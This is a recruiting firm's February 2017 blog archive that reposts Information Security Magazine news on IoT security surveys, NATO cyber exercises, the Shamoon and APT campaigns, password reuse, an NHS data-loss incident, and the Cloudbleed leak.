Intelligent Connections. Recruiting Integrity.
Call Us: 415-510-2973

Archive for February 2017

'Digital Cohesion' Shows Promise, Security Concerns

'Digital Cohesion' Shows Promise, Security Concerns

The era of “digital cohesion,” a paradigm where advanced artificial technologies and networks are used to support mega-services that adapt to human behavior and anticipate their needs, is seen as an inevitable, positive societal change, according to Juniper Networks.

Juniper, in a new report, describes digital cohesion as taking diverse apps, platforms, services and data we use on a daily basis and enable them to work together seamlessly, securely and smartly. This paves the way for predictive, automated, network-based mega-services that adapt to user behavior, enabling better decision-making and enriching personal and business lives.

As a simple example, imagine a single service that makes suggestions for what to have for dinner. Seems basic enough, but this mega-service will take information from your health and fitness device to understand your calorie requirements and dietary restrictions. It will combine this with your cooking app to understand what food you like and then link to your calendar to know when it’s best to eat. It could also tap into your smart fridge to see what ingredients are on hand and/or use your location to determine what local stores or restaurants are available and order if appropriate.

The company’s research shows that 60% of global consumer respondents expect smart connectivity to be commonplace within five years. Another 60% of them anticipate digital cohesion will deliver ‘technology success’ through automation/control, and 51% anticipate it will deliver ‘strategic success’ through improved customer experiences.

This era is already underway: A full 91% of global senior ITDM respondents have seen an increase in the number of ‘smart’ infrastructure devices connecting to their corporate networks in the past three years.

Business respondents in the survey said that they expect digital cohesion to deliver advantages including increased productivity, improved budget efficiency, new workforce management models and business service innovation. Interestingly, the research shows that many prioritize integration and interoperability over specific features or looks.

However, despite all of the positive indicators, the first iteration of this smart-thing network (i.e.,the internet of things) has shown that data security and privacy are two potential bugbears to market development. And ultimately, trust is the game-changer for mega-service providers related to privacy and security of data.

For instance, 53% of consumers specified that security is the most important factor when selecting a new smart device, while 66% of business respondents said security/compliance is the biggest risk factor in digital cohesion. Additionally, only 25% of business respondents said they’re completely ready to trust the security in underlying networks and devices. Juniper Research shows that trust is non-negotiable for users and a thoughtful, proactive approach to security is paramount.

Both consumers and business users see their mobile devices as the portals that drive these mega-services. As a result, telecom service providers will need to re-examine the way they build and deploy their networks in order to support this era.

Source: Information Security Magazine

Crossed Swords 2017 Takes Cyber War Games to Next Level

Crossed Swords 2017 Takes Cyber War Games to Next Level

Crossed Swords 2017, the cyberwar games sponsored by the NATO Cooperative Cyber Defence Centre of Excellence, has added an element of cyber-kinetic engagement for the first time.

Taking place earlier this month, the exercise focused on developing tactical execution skills in a responsive cyber-defense scenario.

“The scenario was based on a military cyber-operation,” explained Aare Reintam, exercise director at the NATO CCD COE. “Penetration testers, digital battlefield professionals and members of Special Forces were tasked with regaining control over a specific military system. This one-of-the kind cyber-kinetic engagement meant that Special Forces were used to retrieve physical evidence, including electronic equipment and data storage devices, as they would in a realistic mission in cooperation with battlefield digital forensics professionals.”

Crossed Swords is the sister exercise of Locked Shields, the world’s largest and most advanced international technical cyber-defense exercise. It focuses on training penetration testers, digital forensics professionals, situational awareness experts and monitoring specialists that fill the role of the attacking team at Locked Shields. Crossed Swords 2017 trained evidence gathering and information analysis for technical attribution as well as identifying and stopping malicious activities.

“Technical cyber-defense exercises typically train information system defense,” said Reintam. “However, this can only be done with a real-time deployment of opposing force played by security specialists and penetration testers. These professionals, usually known as the Red Team, are the focus of Crossed Swords.”

Source: Information Security Magazine

#MWC2017: IoT Adoption Continues to Present Security Challenges

#MWC2017: IoT Adoption Continues to Present Security Challenges

The internet of things (IoT) will soon be widespread, as 85% of businesses plan to implement it by 2019—opening up a big tear in the cybersecurity fabric at enterprises.

The Internet of Things: Today and Tomorrow report, published by Hewlett Packard Enterprise’s Aruba division, confirms the clear business benefits from investments in IoT. However, Aruba’s report cautions that connecting thousands of things to existing business networks has already resulted in security breaches for the majority of organizations.

The research questioned 3,100 IT and business decision makers across 20 countries to evaluate the current state of IoT and its impact across different industries. The study shows that while virtually all business leaders (98%) have an understanding of IoT, many are unclear of the exact definition of IoT and what it means for their business.

“The ‘internet of things’ means sensors connected to the internet and behaving in an internet-like way by making open, ad hoc connections, sharing data freely and allowing unexpected applications, so computers can understand the world around them and become humanity’s nervous system technology,” said tech visionary Kevin Ashton—who coined the term “internet of things,” in an Aruba eBook.

When examining the business benefits of IoT, Ashton discovered that the real-world benefits gained from IoT exceeded even the original expectations. This “expectations dividend” is evident in two key performance areas: business efficiency and profitability.

As an example, only 16% of business leaders projected a large profit gain from their IoT investment, yet post-adoption, 32% of executives realized profit increases. Similarly, only 29% of executives expected their IoT strategies to result in business efficiency improvements, whereas actual results show that 46% experienced efficiency gains.

“With the business benefits of IoT surpassing expectations, it’s no surprise that the business world will move towards mass adoption by 2019,” said Chris Kozup, vice president of marketing at Aruba. “But with many executives unsure of how to apply IoT to their business, those who succeed in implementing IoT are well positioned to gain a competitive advantage.”

Yet, Aruba's research reveals that alongside these positive returns, the study also uncovers that security flaws are found across many IoT deployments. The study shows that 84% of organizations have experienced an IoT-related security breach. More than half of respondents declared that external attacks are a key barrier to embracing and adopting an IoT strategy.

That said, a holistic IoT security strategy, built on strong network access control and policy management, will not only protect enterprises but also simplify the security approach for IT.

 “While IoT grows in deployment, scale and complexity, proper security methodologies to protect the network and devices, and more importantly, the data and insights they extract, must also keep pace,” Kozup added. “If businesses do not take immediate steps to gain visibility and profile the IoT activities within their offices, they run the risk of exposure to potentially malicious activities.”

Source: Information Security Magazine

IISP Apply to Privy Council for Information Security Royal Charter

IISP Apply to Privy Council for Information Security Royal Charter

The Institute of Information Security Professionals (IISP) has officially applied to the Privy Council for a Royal Charter.

Amanda Finch, general manager of the independent not-for-profit body, told Infosecurity that the Royal Charter is “something that I, and the board, feel is needed for the profession.”

“As the stakes are getting increasingly higher, organizations will want to hire people that have a chartered status,” said Finch. “In the same way that when you go to a doctor, you don’t want to see someone who will give you snake oil – you want to see a qualified doctor.”

Finch declared that Chancellor of the Exchequer, Philip Hammond, outlined his expectation that by 2020, the information security industry should offer a Royal Charter for qualified industry professionals. “There is a lot of support for this,” she added.

An application for a Royal Charter takes the form of a Petition to The Sovereign in Council. Charters are granted rarely and a body applying for a Charter would normally be expected to meet a number of criteria. 

“There can only be one Royal Charter [for an industry],” argued Finch, “and to get that, you need to be uniquely positioned to represent the profession and financially sound. It’s a rigorous process,” she said, stressing that IISP are well positioned to be successful in its application. “We’d like to migrate a lot of our members into chartered members.”

The IISP is hoping to hear back about the status of their application within the next few months.

Source: Information Security Magazine

Research: Shamoon Attackers Targeted Specific Victims

Research: Shamoon Attackers Targeted Specific Victims

New research from Symantec has revealed that recent attacks involving the destructive malware Shamoon (W32.Disttrack.B) were aimed at specific Middle East targets, although those suspected of being behind them appear to be linked to a much wider campaign. 

In a blog post on its website, the firm explained that whilst the attackers were able to compromise multiple victims in the region, only selected organizations in or linked to Saudi Arabia were targeted with the destructive wiping attacks.

Symantec claimed the campaign was carried out by a group they have identified as Timerworm, who facilitated the third wave of attacks involving Shamoon in January 2017, with the group also suspected of being part of a much larger operation infiltrating a far broader range of organizations than those affected by the Shamoon attacks.

“During the January attacks, Symantec discovered a high correlation between Timberworm and the presence of Shamoon in a number of organizations in Saudi Arabia,” wrote a Symantec security researcher. “Timberworm appears to have gained access to these organizations’ networks weeks and, in some cases, months before the Shamoon attacks occurred.”

Once on the network, the attackers' primary goal was detailed network reconnaissance, credential harvesting and persistent remote access, Symantec added, with Shamoon preconfigured with a wipe date and the necessary credentials to maximize the overall impact during a coordinated attack.

Symantec said that Timberworm’s planned campaign saw them target individuals at certain companies with spear phishing emails, some of which contained Microsoft Word or Excel files as attachments, whilst others contained malicious links to similar files.

Opening the documents invoked PowerShell from a malicious macro, granting the attackers remote access to the affected computer. Once Timberworn established the target was of interest it deployed custom malware, hacktools and software traditionally used in system/network administration. 

From there, the cyber-criminals configured the Shamoon payloads per organization and then coordinated the attacks on a pre-determined date. 

“The Shamoon attacks illustrate how a growing number of targeted attack groups are relying on common-off-the-shelf tools to compromise targets,” continued Symantec. “The Shamoon attackers managed to get access to targets’ networks using socially engineered spear phishing emails and abusing Office macros and PowerShell to gain initial footholds. In particular, the use of PowerShell has been a popular tactic of late. 

“The appeal of ‘living off the land’ is obvious. Attackers believe malicious activity will be more difficult to detect if legitimate tools are involved and malware use is kept to a minimum. The use of legitimate tools may also serve to thwart attribution to specific actors.”

Source: Information Security Magazine

Japan-Centric APT Campaign Targets Government

Japan-Centric APT Campaign Targets Government

The hackers believed to be behind the election-season hacking in the United States may have now set their sights on Japan.

While investigating some of the smaller-name servers that the hacking group, known as APT28 or Sofacy, routinely use to host its infrastructure, security firm Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals. The fir tracks this threat group internally as “Snake Wine.”

“The Snake Wine group has proven to be highly adaptable and continued to adopt new tactics in order to establish footholds inside of victim environments,” Cylance researchers said in a blog post. “The exclusive interest in Japanese government, education, and commerce will continue into the future as the group is just starting to build and utilize their existing current attack infrastructure. If the past is an accurate indicator, attacks will continue to escalate in both skill and intensity as the attackers implement new tactics in response to defenders acting on previously released information.”

The campaign began around August of 2016—and to date, all observed attacks have been the result of spear phishing attempts against the victim organizations, in which malicious attachments unpack a back door that functions primarily as a modular platform. The attacker then has the ability to directly download additional modules and execute them in memory from the command and control (C2) server.

Common activities are identifying processor, memory, drive and volume information, executing commands directly from the attacker, enumerating and removing files and folders, and uploading and downloading files. A number of the samples are signed using the leaked code-signing certificate from the Hacking Team breach.

As for attribution, Snake Wine has aspects that link it to the Russian group—but also leaves footprints that trace back to Chinese actors.

“[The] registration style was eerily close to previously registered APT28 domains; however, the malware used in the attacks did not seem to line up at all,” Cylance researchers said. “Cylance believes some of the steps taken by the attacker could possibly be an attempt at a larger disinformation campaign based upon some of the older infrastructure that would link it to a well-known CN-APT group.”

Perhaps the most interesting aspect of the Snake Wine group is the number of techniques used to obscure attribution. 

“Signing the malware with a stolen and subsequently publicly leaked code-signing certificate is sloppy even for well-known CN-APT groups,” the researchers said. “Also of particular interest from an attribution obfuscation perspective is direct IP crossover with previous Dynamic DNS domains associated with known CN-APT activity. A direct trail was established over a period of years that would lead competent researchers to finger CN operators as responsible for this new activity as well.  Also of particular interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28.”

Source: Information Security Magazine

Password re-use is rampant among Millennials 18-30

Password re-use is rampant among Millennials 18-30

Nearly 60% of mobile device users have had to reset a password in the past two months.

Further, a survey by Keeper Mobile has found that more than half of respondents are still trying to remember their passwords in their heads. They are also two times more likely to have trouble logging into an account if they wrote their passwords down or tried to memorize them.

This is directly related to the alarming statistic that found that 87% of mobile device users between the ages of 18-30 reuse passwords across multiple websites and applications.

This bad habit could result in millions of accounts being compromised since hackers typically test a stolen password against multiple accounts, including banking, retail, social media, email and healthcare websites. One stolen password could give a hacker the keys to a person’s digital life.  

Users are not without awareness of the issue: The survey also showed that nearly half (46%) of respondents think their phone is the least secure device that they own. Even so, 41% use their phone for sensitive, password-protected applications (banking/healthcare).

“People have a tremendous amount of personal and confidential information on their smartphones,” said Darren Guccione, CEO and co-founder of Keeper Security. “It was disturbing to find that almost half of respondents in our survey think their phone is the least secure device that they own, yet 55% of them haven’t downloaded a security application. It is clear that further education regarding the importance of mobile cybersecurity is necessary in order to protect their digital lives.”

Interestingly, age and salary correlate to the to the level of security on a phone. About half (46%) of people aged 45+ do not password-protect their phones with a secure lock screen, compared to 26% of those aged 44 and under. And, 34% of respondents making under $75,000 annually do not password-protect their phone, compared to 25% of those making $75,000 or more.

Also, the vast majority are not worried about social media security, yet 75% of users connect to their social media profiles on other websites and applications (e.g. login with Facebook).

“An important first step to mobile cybersecurity is for consumers to learn how to create secure passwords and not reuse passwords over multiple logins,” noted Guccione. “Also, website administrators need to implement password complexity policies to secure users.”

Source: Information Security Magazine

#MWC2017: Large Portion of Orgs Lack Enterprise Mobility Maturity

#MWC2017: Large Portion of Orgs Lack Enterprise Mobility Maturity

About 38% of enterprises still only use mobility solutions for basic tools like email and calendar, and do not have a firm requirement to secure their staff’s devices.

According to a study from Sapio Research, this is having significant negative consequences: These enterprises are 15% less productive and 29% less profitable than those with more advanced mobile capabilities, such as file-sharing apps, collection and analysis of data, app integrations and multifactor authentication.

The study examines the different rates of adoption of enterprise mobility across more than 500 businesses in the UK and the US and classifies them into a four-stage maturity model: Entry-level, opportunistic, additive and transformational. Progress through each stage was determined by the degree of use of productivity tools and data, and the security measures required.

Despite enterprise mobility being an accepted norm, 38% of enterprises have failed to progress beyond the entry level stage, and 81% remain in the bottom half. About a fifth (19%) are in the third stage of the model, additive (typified by app integrations), the collection of devices’ contextual usage data.

There are clear incentives for moving up the stack, as it were: CIOs and IT teams who have delivered the most advanced enterprise mobility are perceived 14% and 12% more favorably within their organizations than those who have only introduced the most basic of functionality.

And, the study showed that the simple step from entry-level to opportunistic (first stage to second stage) delivers the greatest and quickest performance improvements. Just by introducing file-sharing tools, monitoring usage data and requiring at least native OS security measures to be in place on the device, enterprises see a 9% profitability improvement and 7% productivity boost.

“The findings of this study underline the case for companies to dedicate investment to their enterprise mobility strategy,” said Dave Schuette, executive vice president of the Enterprise Business Unit at Synchronoss, which sponsored the survey. “Until now, the benefits of mobility maturity have been anecdotal or theoretical. We now know that those who invest in advanced mobility tools—balancing efficiency with security—benefit from double-figure improvements in productivity, in turn contributing to massive profitability gains.”

Security, he added, is one of the most important aspects of mobile maturity.

“Productivity doesn’t come from the availability of mobility tools alone,” Schuette noted. “Collecting contextual data from employees’ devices lets a company make informed, deliberate changes that improve its operations and processes. That same data can also be used for more robust user ID verification, boosting security. The higher the security on a device, the more capabilities an organization can confidently add to it—which in turn improves productivity. It’s the ultimate virtuous circle for enterprise technology.”

Source: Information Security Magazine

Calls for Digitization After NHS Data Loss Blunder

Calls for Digitization After NHS Data Loss Blunder

Security experts are urging the NHS to accelerate its digital transformation after more than half a million letters sent between GPs and hospitals went undelivered over a five-year period, putting patient lives at risk.  

Thousands of patients are feared to have been harmed by the massive mix-up, which led to the company hired to deliver the documents instead storing them in a warehouse, according to the Guardian.

NHS Shared Business Services, which was part owned by the Department of Health, has now finally delivered the letters to 7700 GP surgeries up and down the country.

However, more than 500,000 documents including test results and cancer screenings were mislaid between 2011 and 2016.

NHS England has now been forced to pay GPs over £2 million to examine the correspondence. The report claimed 2500 cases so far require further investigation to discover potential for harm.

A separate investigation has apparently been launched to see whether any patient deaths may have been caused by the incident, which was finally discovered in March last year.

Opposition party leaders are claiming health secretary Jeremy Hunt deliberately misled parliament by failing to provide details of the incident last year.

Hunt’s plans for a paperless NHS by 2018 were quietly dropped this month after an outside expert apparently judged the country’s hospital IT systems unable to support the move.

However, Smoothwall healthcare specialist, Zak Suleman, argued the latest revelations are proof of the need to urgently digitize all parts of the NHS.

“A fully paperless NHS that allows the easy exchange of data would be more efficient and fool proof than the current set-up. However, to simply ‘digitalize’ one of the biggest institutions in the UK is a complex overhaul and the government must ensure, above all else, that all data is kept safe and secure,” he claimed.

“The NHS must embrace technology now or risk further debacles using outdated solutions.”

Egress co-founder, Tony Pepper, added that physical data is inherently less secure than digital, being difficult to trace and open to interference.

"While digital records have their own set of challenges, with the right foresight and security and compliance mechanisms in place, it's far less likely to go missing or be subject on this scale to the same issues of human error,” he argued.

“We're yet to discover the full extent of this data loss, but it's not an over-reaction to suggest the difference between going digital or not is a matter of life or death."

Source: Information Security Magazine

Cloudflare Bug Spills Private Data Online

Cloudflare Bug Spills Private Data Online

Security experts are urging users to change all of their online passwords after a problem at content delivery network Cloudflare exposed customer data from countless clients including Uber, Fitbit and OK Cupid.

The source of the problem – which was discovered accidentally by Google Project Zero bod, Tavis Ormandy – was a memory leak caused by a broken HTML parser chain.

However, it was compounded by the fact that leaked data was then cached by search engines.

The leaked data included “private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data,” Cloudflare CTO, John Graham-Cumming explained in a lengthy blog post.

“We quickly identified the problem and turned off three minor Cloudflare features (email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response,” he added.

Although Graham-Cumming claimed the bug was fixed globally in under seven hours, it may have been leaking highly sensitive data for months.

“The greatest period of impact was from February 13 and February 18 with around one in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests),” he added.

In fact, given the extent of the info cached by search engines, Cloudflare clients will now be under pressure to inform their own customers of the extent of the privacy snafu.

“The examples we're finding are so bad, I cancelled some weekend plans to go into the office on Sunday to help build some tools to cleanup. I've informed Cloudflare what I'm working on,” said Ormandy.

“I'm finding private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings. We're talking full https requests, client IP addresses, full responses, cookies, passwords, keys, data, everything.”

Although he praised Cloudflare for its response to the issue, it’s also true the firm’s bug bounty offers little in the way of rewards for white hat researchers – free t-shirts, rather than money.

Former Google click fraud boss and current Shape Security CTO, Shuman Ghosemajumder, argued that it is “one of the widest exposures of confidential and sensitive consumer data ever observed.”

“This incident has many people suggesting that everyone in the world should change all of their passwords immediately,” he said.

“The total exposure is likely not that large – i.e., not all of your passwords have been compromised – but the problem is that almost any one of your passwords on over four million websites could have been compromised, so the safest course of action is to act as though all of your passwords were compromised.”

Kaushik Narayan, CTO at Skyhigh Networks, analyzed over 30 million enterprise users worldwide and found 99.7% of companies have at least one employee that used a Cloudbleed vulnerable cloud application.

“This means hackers could have stolen user passwords for these cloud applications – and may even have access to session keys exposed, while a session is live. But this user-data also revealed another surprise – out of 128 enterprise-ready applications that could have been compromised, only four were vulnerable,” he added.

“Cloudbleed is the latest in a string of vulnerabilities that should be of concern to enterprise IT security and a reminder us of the problems caused by user password reuse across corporate services and personal web sites and cloud services.”

Source: Information Security Magazine